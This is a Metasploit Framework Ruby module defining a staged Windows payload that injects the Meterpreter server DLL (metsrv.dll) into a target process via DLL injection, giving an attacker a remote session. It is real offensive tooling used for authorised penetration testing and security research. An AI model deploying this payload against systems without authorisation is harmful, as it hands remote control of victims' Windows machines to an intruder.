modules/payloads/stages/windows/patchupmeterpreter.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# Injects the meterpreter server instance DLL via the DLL injection payload.
#
###
module MetasploitModule
include Msf::Payload::Windows::DllInject
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Meterpreter (skape/jt Injection)',
'Description' => 'Inject the meterpreter server DLL (staged)',
'Author' => 'skape',
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_x86_Win))
# Don't let people set the library name option
options.remove_option('LibraryName')
options.remove_option('DLL')
end
#
# The library name that we're injecting the DLL as has to be metsrv.dll for
# extensions to make use of.
#
def library_name
"metsrv.dll"
end
def library_path
MetasploitPayloads.meterpreter_path('metsrv','x86.dll')
end
end